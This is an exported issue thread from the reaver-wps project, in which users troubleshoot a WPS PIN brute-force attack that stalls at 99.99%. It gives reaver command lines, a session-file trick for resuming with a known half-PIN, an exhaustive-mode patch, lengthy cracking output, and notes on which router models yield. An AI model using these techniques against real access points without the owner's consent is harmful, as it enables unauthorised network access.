deviouschu / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Stuck 99.99%, repeats one key #195

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 10.10

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

43db

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -a and sometimes -p argument

6. Please describe what you think the issue is.

I don't know, it stucks to 99% and keeps repeating the same PIN.

7. Paste the output from Reaver below.

It's big so I put it here http://pastebin.com/raw.php?i=RDzF0FBz

Original issue reported on code.google.com by darknw...@gmail.com on 28 Jan 2012 at 10:30

GoogleCodeExporter commented 9 years ago
I Have The solution to resolve these problems. Rebuild the Pin guide file.

    Reaver scan stops working, stacking at 9x.xx% or 99.99%. Sometimes repeats the same pin in loop and get WSC error.  

Don’t know how and why these problems occur. Maybe a little bug in reaver or 
the AP changes the pin in meantime. 
     But after a little research and some close tests I manage the solution to resolve these problems. Working fine every time when these errors happens.

    First of all you have to be 100% sure that following things are ok:

*** The first 4 digits of pin. (THIS IS MOST IMPORTANT). I’ll show in the 
final of post how to know if is real true) 

*** Fair/Good Strength and quality of AP signal

My Case:
>>ESSID: TP_LINK-PSC
>>BSSID: F4:C3:F6:01:BD:1A
>>CHANNEL: 2
>>PIN First 4 DIGITS: 9104

Lets Begin:
     1---You need to locate the reaver work directory, their will be a file with name “bssid of AP”.wpc and reaver.db 

my case: 
/usr/local/etc/reaver/  make a backup of this directory and erase that two 
files. 
F4C3F601BD1A.wcs and reaver.db

    2----Set the Wi-Fi card in monitor mode in same channel of the target AP

    3----Now start a new reaver scan, reaver  -i “interface” -b  “bssid” -e “essid” --t "time to wait M5/7" c “channel” -vv -n 
In my case the input was:
reaver  -i mon0 -b F4:C3:F6:01:BD:1A -e TP-LINK -t 0.9 -c 11 -vv -n 
then press enter, you should see something like this

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 2
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 12345670

(Note: you SHOULD NOT see the Restore question yet, if you do,  something is 
wrong. stop and Check if you are in the right directory. You can use the 
command locate reaver.db to find the right one.)

After the THIRD pin check, stops the scan with CTRL+C  ^c  
my case the third was 01230153

[+] Trying pin 01230153
^C
[+] Nothing done, nothing to save.

-----4----Now comes the trick. In the reaver work folder open the "essid".wpc 
file and you will see the are one column with multiple lines 
each line with 4 numbers, this numbers are the sequence that reaver will follow 
to  find the first four numbers of pin.
 So edit end change the 3333 and put your four digit.
my case
cat F4C3F601BD1A.wcs
2
0
0
1234
0000
0123
1111
2222
3333   >  change for you first 4 pin number  
4444

    then
2
0
0
1234
0000
0123
1111
2222
9104
4444

 Save and run reaver again. 
This time WE WANT restore the previous scan

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 2
[?] Restore previous session for F4:C3:F6:01:BD:1A? [n/Y] y
[+] Restored Previous Session
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 11110718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending....
      ..... WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2013-05-29 09:59:08 (11 seconds/pin)
[+] Trying pin 91040004
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message     > (If You receive the M5 indicates that you have 
the 4 first right digits.) 
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040008
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.19% complete @ 2013-05-29 09:59:44 (11 seconds/pin)
[+] Trying pin 91040010
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040017

Wait and you will see the count jumps to 90.00% with no bug anymore. and this 
time reaver will try every possible combination. 

after +-2 hours
........
[+] Trying pin 91040893
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message  > (DONE!!!)
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1092 seconds
[+] WPS PIN: '91040893'
[+] WPA PSK: 'xxxxxxxxxxxxx'
[+] AP SSID: 'TP-LINK'

* To ensure that you have the right first 4 digits, you need to check two thing

First You have to be able to receive the M5 Message, this indicate that first 
half of pin are Right
Second when you set the pin, the percentage should get to 90% 

Hope works to you guys like worked for me. If you still get stuck do all over 
again, happens to me when the signal was weak..
you can try this before or after the Stefano's Solution.
 That it, Good Luck
And Remember only test AP with permission of the owner.  :)

Original comment by morenohe...@gmail.com on 29 May 2013 at 7:34

GoogleCodeExporter commented 9 years ago
Hi,

Some months ago I jumped directly into this issue and, after seeing some of the 
comments here, I went directly into downloading the code and fixing the issue.

At the moment I have a completely functional version with the following 
features:

1. Fixed the 99.9% never ending loop: If the end is reached without success, 
the application exits as expected. (before it continued until it was 
interrupted or killed)
2. Added an exhaustive option (--exhaustive, -X) which uses "set_p1(p1_index) + 
set_p1(p2_index)" instead of "set_p1(p1_index) + set_p2(p2_index)" to force 
covering all possible combinations. This ensures that the PIN is found even if 
it does not follow the "checksum" rules. However this makes of corse the 
process much longer.
3. If the -X option is not provided, the application runs as usual. However, if 
it reaches the end without having found a valid PIN, it gets the first half of 
the PIN which has been already found and restarts scanning for the second one 
in exhaustive mode. This makes the overall process much longer in the worst 
scenarios, but this ensures that the PIN is finally found in all cases (if the 
signal is strong enough).
4. Added two options: (--p1-index, -1) and (--p2-index, -2) which allows 
setting an initial value for the respective indexes. Useful if you lost a 
previous session.
5. Added some "aesthetic" improvements, such as displaying the elapsed time and 
the estimated remaining time in AdBhCmDs format, or displaying each time the 
Pin counter and the Max Pin attempts (in verbose mode).

And, here you have a snapshot of the new output, making use of the new "-2" 
option as an example, including the instant in which the mode changes from 
"checksum" to "exhaustive" (notice how the "Max pin attempts" increases to 
20000 and how Pin count goes down to 10001) and displaying the elapsed and 
remaining time:

# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -v -S -t7 -d 10 -p 4247 -2 998

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Starting Cracking Session. Pin count: 10998, Max pin attempts: 11000
[+] Trying pin 42479970.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 42479987.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 42471234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 42470000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 42470123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 42471111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d0h1m18s.
[+] Trying pin 42472222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] Trying pin 42473333.
[+] Pin count advanced: 10006. Max pin attempts: 20000
[+] Trying pin 42474444.
[+] Pin count advanced: 10007. Max pin attempts: 20000
[+] Trying pin 42475555.
[+] Pin count advanced: 10008. Max pin attempts: 20000
[+] Trying pin 42476666.
[+] Pin count advanced: 10009. Max pin attempts: 20000
[+] 50.04% complete. Elapsed time: 0d0h2m22s.
[+] Estimated Remaining time: 1d9h18m12s
[+] Trying pin 42477777.
[+] Pin count advanced: 10010. Max pin attempts: 20000

The weird thing about all this is that I already sent two messages to the 
project owners asking for commit permissions to upload my patch and I got 
absolutely NO response from them. At all!

I am not a big friend of the "forking" concept, but man, it's been more than 
one year since the last signs of life from the committers, and it's a pitty to 
have such a useful project just abandoned where there are plenty of issues and 
volunteers to solve them!
May we think about it?

Original comment by c.sala....@gmail.com on 18 Jun 2013 at 12:06

GoogleCodeExporter commented 9 years ago
carles, in case you don't get a response from the original developers can you 
share the your source code changes here? It seems like you created a better 
version and there is no need to reinvent the wheel

Original comment by erhance...@gmail.com on 23 Jun 2013 at 11:40

GoogleCodeExporter commented 9 years ago
Hi,

I received several requests about those modifications, so I made them public in 
pastebin: http://pastebin.com/EcWw7e7n

Here you have the instructions to install the changes in linux:
- Download a fresh version of the code (revision 113).
- go to this link: http://pastebin.com/EcWw7e7n
- Paste the contents into a patch file inside the trunk folder (let's say, 
reaver-wps.patch)
- execute the following command from inside the trunk folder (without quotes): 
"patch -p1 < reaver-wps.patch"
- follow the reaver build and installation instructions as usual.

If you have any issues, please feel free to send me an e-mail and I'll try to 
give you a hand.

Regards,
Carles

Original comment by c.sala....@gmail.com on 29 Jun 2013 at 11:55

GoogleCodeExporter commented 9 years ago
Hi¡ great work Carles.sala, it will be interesting if you could made a mod 
with your changes so the lazy noobs like me that dont know nothing about 
programming could install the reaver mod instead of doing all that anoying 
work¡ you could load it in rapidshare or similar.

Thanks in advance.

Original comment by Lamonafi...@gmail.com on 2 Jul 2013 at 5:12

GoogleCodeExporter commented 9 years ago
Yeah, I agree with Lamonafi,
I really appreciate If you do that.

Original comment by saeed.y2...@gmail.com on 2 Jul 2013 at 9:25

GoogleCodeExporter commented 9 years ago
Hi,

Some of you reported having problems with the patch (apparently pastebin 
modifies slightly the pasted text (white spaces and so on) and then patch does 
not pick up the changes as expected).

Therefore, I finally opted for creating a fork repository 
(http://code.google.com/p/reaver-wps-fork/) where this issue is already fixed.

I still didn't have time to prepare and upload the binaries, but the version is 
ready to download and install.

Here you have the steps which you can just copy/paste (run as root!):

NOTE: If you are running ubuntu, make sure you have libsqlite3-dev installed:
# apt-get install libsqlite3-dev

# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ 
reaver-wps-fork-read-only
# cd reaver-wps-fork-read-only/src
# ./configure
# make distclean && ./configure #(you can skip this step if you never installed 
reaver before)
# make
# make install

If you have any doubts, or you want to contribute in the project with your own 
changes, please feel free to contact me.

Regards,
Carles

Original comment by c.sala....@gmail.com on 7 Jul 2013 at 12:15

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi c.sala¡ I test your program today , works fine but sessions cant be saved. 
What comand should I use if i want to start the pin count in 5267 3000 for 
example? (I know the first 4 digits).
Thanks.

Original comment by Lamonafi...@gmail.com on 8 Jul 2013 at 8:01

GoogleCodeExporter commented 9 years ago
i installed the patch  "patch -p1 < reaver-wps.patch" and now reaver doesnt 
compile at all. how do i uninstall?

Original comment by J0J0...@gmail.com on 25 Jul 2013 at 5:28

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
I installed the patch, this is the output

[+] Waiting for beacon from XX:C6:XX:62:F2:XX
[+] Associated with XX:C6:XX:62:F2:XX (ESSID: xxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 12340002.
[+] Pin count advanced: 10002. Max pin attempts: 11000
[+] Trying pin 12342228.
[+] Pin count advanced: 10003. Max pin attempts: 11000
[+] Trying pin 12343331.
[+] Pin count advanced: 10004. Max pin attempts: 11000
[+] Trying pin 12344444.
[+] Pin count advanced: 10005. Max pin attempts: 11000
[+] 90.95% complete. Elapsed time: 0d0h1m9s.
[+] Trying pin 12345557.
[+] Pin count advanced: 10006. Max pin attempts: 11000
[+] Trying pin 12346660.
[+] Pin count advanced: 10007. Max pin attempts: 11000
[+] Trying pin 12347773.
[+] Pin count advanced: 10008. Max pin attempts: 11000
[+] Trying pin 12348886.
[+] Pin count advanced: 10009. Max pin attempts: 11000
[+] Trying pin 12349999.
[+] Pin count advanced: 10010. Max pin attempts: 11000
[+] 91.00% complete. Elapsed time: 0d0h2m7s.
[+] Estimated Remaining time: 0d3h1m30s
[+] Trying pin 12340019.
[+] Pin count advanced: 10011. Max pin attempts: 11000
[+] Trying pin 12340026.
[+] Pin count advanced: 10012. Max pin attempts: 11000
[+] Trying pin 12340033.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12340033.
[+] Pin count advanced: 10013. Max pin attempts: 11000
[+] Trying pin 12340040.
[+] Pin count advanced: 10014. Max pin attempts: 11000
[+] 91.04% complete. Elapsed time: 0d0h3m5s.
[+] Estimated Remaining time: 0d3h50m4s
[+] Trying pin 12340057.
[+] Pin count advanced: 10015. Max pin attempts: 11000
[+] Trying pin 12340064.
[+] Pin count advanced: 10016. Max pin attempts: 11000
[+] Trying pin 12340071.
[+] Pin count advanced: 10017. Max pin attempts: 11000
[+] Trying pin 12340088.
[+] Pin count advanced: 10018. Max pin attempts: 11000
[+] Trying pin 12340095.
[+] Pin count advanced: 10019. Max pin attempts: 11000
[+] 91.08% complete. Elapsed time: 0d0h4m3s.
[+] Estimated Remaining time: 0d2h59m51s
[+] Trying pin 12340101.
[+] Pin count advanced: 10020. Max pin attempts: 11000
[+] Trying pin 12340118.
[+] Pin count advanced: 10021. Max pin attempts: 11000
[+] Trying pin 12340125.
[+] Pin count advanced: 10022. Max pin attempts: 11000
[+] Trying pin 12340132.
[+] Pin count advanced: 10023. Max pin attempts: 11000
[+] Trying pin 12340149.
[+] Pin count advanced: 10024. Max pin attempts: 11000
[+] 91.13% complete. Elapsed time: 0d0h5m2s.
[+] Estimated Remaining time: 0d2h58m56s
[+] Trying pin 12340156.
[+] Pin count advanced: 10025. Max pin attempts: 11000
[+] Trying pin 12340163.
[+] Pin count advanced: 10026. Max pin attempts: 11000
[+] Trying pin 12340170.
[+] Pin count advanced: 10027. Max pin attempts: 11000
[+] Trying pin 12340187.
[+] Pin count advanced: 10028. Max pin attempts: 11000
[+] Trying pin 12340194.
[+] Pin count advanced: 10029. Max pin attempts: 11000
[+] 91.17% complete. Elapsed time: 0d0h5m59s.
[+] Estimated Remaining time: 0d2h58m1s
[+] Trying pin 12340200.
[+] Pin count advanced: 10030. Max pin attempts: 11000
[+] Trying pin 12340217.
[+] Pin count advanced: 10031. Max pin attempts: 11000
[+] Trying pin 12340224.
[+] Pin count advanced: 10032. Max pin attempts: 11000
[+] Trying pin 12340231.
[+] Pin count advanced: 10033. Max pin attempts: 11000
[+] Trying pin 12340248.
[+] Pin count advanced: 10034. Max pin attempts: 11000
[+] 91.22% complete. Elapsed time: 0d0h6m57s.
[+] Estimated Remaining time: 0d2h57m6s

waiting for reaver to finish

Original comment by rbeldua on 2 Aug 2013 at 5:54

GoogleCodeExporter commented 9 years ago
[+] Trying pin 12349975.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 12349982.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] 100.00% complete. Elapsed time: 0d3h26m13s.
[+] Estimated Remaining time: 0d3h26m13s
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 12341234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 12340000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 12340123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 12341111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] Trying pin 12342222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d3h27m29s.
[+] Estimated Remaining time: 0d3h27m29s

why it restarts at 50%?

Original comment by rbeldua on 2 Aug 2013 at 10:45

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi,

#60 and #62: I already said in my comment #57 that the patch was messed up by 
pastebin and that it didn't work as expected.
Please checkout the version from reaver-wps-fork project 
(http://reaver-wps-fork.googlecode.com/svn/trunk/), which does compile properly.

#64: I explained that in comment #52. The 99.99% problem appeared because the 
WPS pin which you are trying to crack does not follow the checksum rule.
Therefore, in the new version of reaver-wps, when it reaches the end of the 
checksum pins it assumes that yours is "non standard" and jumps automatically 
to the exhaustive mode, which brute forces all 8 digits instead of brute 
forcing 7 of then and calculating the last one using a checksum.

This has two big consequences:
On one side, chances of matching the pin increase dramaticallty.
However, on the other side, the crack time for one of those non-standard pins 
can be of several days instead of several hours (bear in mind that, before, 
this kind of pins could not be creacked at all using reaver "as-was").

I hope this clears up your doubts.

Original comment by c.sala....@gmail.com on 3 Aug 2013 at 2:06

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Thank you Carles,

I do not have Internet at home, making installation of this patch impossible.

Can you rap it up and upload it somewhere¿ 

Again thank you!

Original comment by sairesea...@gmail.com on 9 Aug 2013 at 11:41

GoogleCodeExporter commented 9 years ago
Hi c.sala! Can you please make possible for reaver to save changes and restart 
the same session,pls pls can you do this?

thanks for great job!

Original comment by ohnostra...@gmail.com on 12 Aug 2013 at 3:53

GoogleCodeExporter commented 9 years ago
how to install this patch onto a live usb installation?

root@kali:~# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ 
reaver-wps-fork-read-only

Checked out revision 3.
root@kali:~# 
root@kali:~# cd reaver-wps-fork-read-only/src
root@kali:~/reaver-wps-fork-read-only/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables... 
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
root@kali:~/reaver-wps-fork-read-only/src#

Original comment by sairesea...@gmail.com on 12 Aug 2013 at 9:05

GoogleCodeExporter commented 9 years ago
how do I install this without Internet connexion?

Original comment by sairesea...@gmail.com on 13 Aug 2013 at 10:36

GoogleCodeExporter commented 9 years ago
Hi Carles. First, thanks for doing the patched version!

Downloaded & installed it (v3) as per http://code.google.com/p/reaver-wps-fork/ 
Runs fine for a bit, but then throws 'Floating point exception' after a 
percent-complete line, see cmdline & output below. Any ideas? Let me know if 
more info would help.

reaver -i mon0 -b 55:66:77:88:99:AA -vv -c 1 -d 4 -t 10 -x 305 -S  -p 8983 -X 
-2 19
...
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 50.23% complete. Elapsed time: 0d0h8m5s.
Floating point exception

Original comment by lord.bla...@gmail.com on 16 Aug 2013 at 9:30

GoogleCodeExporter commented 9 years ago
same as #74

[+] Trying pin 12343126.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 93.82% complete. Elapsed time: 0d0h2m33s.
Floating point exception

Original comment by sairesea...@gmail.com on 17 Aug 2013 at 2:20

GoogleCodeExporter commented 9 years ago
syntax was...

reaver -i mon0 -c 11 -b BC:76:70:E0:71:EC -vv -p 1234 -2 310

Original comment by sairesea...@gmail.com on 17 Aug 2013 at 2:24

GoogleCodeExporter commented 9 years ago
OK, a bit more info to add to #74:
1. The floating point error is fairly rare, what's more common is to simply 
stop without error (or answer).
2. The problem only happens immediately after the "% complete. Elapsed time: " 
line.
3. The problem seems to happen only after multiple WPS transaction fails.
Hope that helps!

Original comment by lord.bla...@gmail.com on 18 Aug 2013 at 9:37

GoogleCodeExporter commented 9 years ago
Yes, agree with #77 that the Floating point exception it is a rare thing and 
happens only (in my case) within the first minute of a session. The last time 
it did it, the syntax was very simple and without any new arguments (reaver -i 
mon0 -c 11 -b BC:76:70:XX:XX:XX -vv).

Getting back to the 99% bug... The fallowing may or may not be related.

Reaver 1.4 has problems with certain routers. Namely Huawei routers (BSSID 
BC:76:70: ...)

1. Does not detect the fist correct four numbers of the PIN, instead giving a 
false positive with 1234, or any four digits you give it, and return the 
"received M5 message".

2. The first problem causes the 99% bug and repeats the last key at the end.

Solution: Reaver 1.3

With a very simple syntax in reaver 1.3 (reaver -i mon0 -c 11 -b 
BC:76:70:DD:0A:28 -vv) I retrieved the information! I did EVERYTHING spending 
DAYS trying with reaver 1.4 and this version (1.4 fork r3) without any success.

@ Carles

any chance for you to include a '-3' argument in the next version? 
-3 as in 'operate like reaver 1.3'

Original comment by sairesea...@gmail.com on 20 Aug 2013 at 4:08

GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
[deleted comment]
GoogleCodeExporter commented 9 years ago
Hi Carles, "Floating point exception" here too.

Original comment by dave...@gmail.com on 24 Aug 2013 at 7:09

GoogleCodeExporter commented 9 years ago
i have the same problem here, and seems to happen only after multiple WPS 
transaction fails, it just stops without answer. im now trying with reaver 1.3 
that seems to be working fine.

Original comment by ushpacor...@gmail.com on 29 Aug 2013 at 6:11

GoogleCodeExporter commented 9 years ago
hello, as i said before reaver 1.3 is working but i still have the 99.99% 
problem because the first 4 numbers are independent from the others, is 
arbitrary and is not in the numbers that reaver tries for the second half. im 
basically were i  started, now reaver actually gets the true four first numbers 
(no M5 false positive) but get stuck at 99.99% and the fork isnt working 
either, does anyone knowns how to solve the 99% loop?

Original comment by ushpacor...@gmail.com on 30 Aug 2013 at 3:16

GoogleCodeExporter commented 9 years ago
I've personally had this problem both with my Alfa 802.11 g/n (the g/n unit
came with my Reaver Pro) and an older Alfa 802.11 b/g USB device (RTL8187).
However my Inetel Centrino Ultimate-n 6300 has no problems on the same
laptop. I've also noticed that all three cards can connect to any of their
compatible access point standards, can send deauth packets but the Alfa's
cannot capture hand shakes using fern, wifite or even manually using tshark
or cowpatty (cowpatty just produces empty files). Not sure if that helps
give insight in to the 99.99% problem or not. To be clear, the Alfa's will
only make it to 99.99% but the Intel will work every time. (Backtrack 5r3,
Kali)

Original comment by brock1...@gmail.com on 30 Aug 2013 at 4:04

GoogleCodeExporter commented 9 years ago
Hi all,

Sorry for not responding to your comments (which I really appreciate), but it 
has been a while since I last came to this thread and I still hadn't seen them.

@Chris: I'm glad to see that you managed to install it without internet, 
however I cannot give a solution for the 1.3 idea. For sure it could be done, 
but I suspect it would be a hard thing to implement, and probably not as worth 
as just looking forward and fixing the current issues. Anyway, I will take 1.3 
version as a reference when trying to fix them.

@Steven and the others with the "Floating point Exception" error: There's 
already an issue created in the fork repo: 
http://code.google.com/p/reaver-wps-fork/issues/detail?id=1
Would you mind following the issue there and uploading any relevant info? I 
must say that I had few time to work on it, and actually I could not manage to 
reproduce the error with any of my routers, but I'll do what I can to fix it.

@Mali: Sure, I will try to fix this. Would you mind creating an issue for it in 
the new repo?
Then it will be easier to follow up.

Regards,
Carles 

Original comment by c.sala....@gmail.com on 16 Sep 2013 at 10:28

GoogleCodeExporter commented 9 years ago
@Carles how do you run exhaustive mod in the 2nd scan for the 1st 4 digit? i 
always got the 1234 for the 1st 4 pin in 2nd scan somebody says that it's false 
positive and i'm receiving M5 message. can you post the code plss?

Original comment by johnjero...@gmail.com on 26 Sep 2013 at 1:42

GoogleCodeExporter commented 9 years ago
HI !

I m sorry for this question but I tried to follow stefano and I don't have a 
folder called reaver-wps-read-only so the following step couldn't be done :

cd /root/reaver-wps-read-only/src

THANKS 

Original comment by amer.hag...@gmail.com on 24 Oct 2013 at 10:20

GoogleCodeExporter commented 9 years ago
Hello Carles, I have the same problem: "Floating point exception (core 
dumped)". 
I was trying to find correct pin on "3Webcube" router, but with no success.
Can you please help me to solve the problem?
I will be grateful to you.
K.

Original comment by djkam...@gmail.com on 6 Nov 2013 at 11:08

GoogleCodeExporter commented 9 years ago
Same problems with trying to crack a small Edimax router. Version 1.4 got stuck 
at 90.90%, the new one gave me a "flouting point exception". It may be because 
I am short of memory. (Using Kali Linux, Dell LAtitude E6500 but only 2GB of 
memory) So I tried version 1.3 and it found both the WPS PIN and the WSK 
passkey in 4,033 seconds.

so a Edimax BR-6258n can be cracked with version 1.3 of reaver. Hope this helps 
someone.

Original comment by cjf.corc...@gmail.com on 30 Dec 2013 at 1:52

GoogleCodeExporter commented 9 years ago
Ok just succeeded with a netgear WN2000RPTv2, using reaver 1.3. I had it do it 
two halves, it stopped at 91.87%, which meant it had found the 1st pin. So I 
restarted adding the --pin parameter as follows 

"reaver -i mon0 -b <bssid> -c <channelNum>  -d --pin 3969"

This unit locks out after 30 bad attempts, then re enables the WPS PIN in 120 
to 300 seconds, ie just left it running..... I can also confirm that disabling 
the WPS PIN in the netgear GUI disables the WPS functionality on this device.

BTW BTHUB3's now appear to lock out the PIN functionality permanently if it 
gets something like 20 wrong PIN's. 

Original comment by cjf.corc...@gmail.com on 30 Dec 2013 at 6:13

GoogleCodeExporter commented 9 years ago
SOME ONE PLEASE FORK reaver already!!!! It is deader than the grim-reaper him 
self!.. If no one forks it, it will NEVER BE UPDATED EVER AGAIN!!..

Original comment by Yas...@gmail.com on 13 Jun 2014 at 7:36

GoogleCodeExporter commented 9 years ago
Has anyone encountered a router that will send out one M5 packet causing reaver 
to think it has the correct first four pins when it doesnt?

I'm not sure if it sends it out then changes the pin or what happens, but after 
it sends out the one initial M5 packet no more get sent out.  This causes 
reaver to enter the 99% loop never finding the solution.

Signal is -67 and I don't seem to have any difficulties receiving or sending 
packets.  What gives?

Original comment by psychede...@gmail.com on 28 Aug 2014 at 2:25

GoogleCodeExporter commented 9 years ago
Hi guys!!! I'm newbie in this world of sec. In my case reaver doesn't crack 
Alice too 

Original comment by kravchen...@gmail.com on 10 Apr 2015 at 7:52

GoogleCodeExporter commented 9 years ago
Se ci sono italiani qui . Rispondetemi !!:)

Original comment by kravchen...@gmail.com on 10 Apr 2015 at 7:56

GoogleCodeExporter commented 9 years ago
Post #51 worked for me.. thanks for the post. It solved the following problems:

[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX

Important Note: I noticed that using macchanger BRINGS BACK the problem above.

I'm using Kali 2.0 / Alfa AWUS036H / Tenda W311R+ Router

** My reaver output below: 

reaver -i wlan1mon -b 00:B0:0C:51:93:20 -e WiFi -t 0.9 -c 6 -vv -n -p 53460806

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching wlan1mon to channel 6
[+] Waiting for beacon from 00:B0:0C:51:93:20
[+] Associated with 00:B0:0C:51:93:20 (ESSID: WiFi)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 53460806.
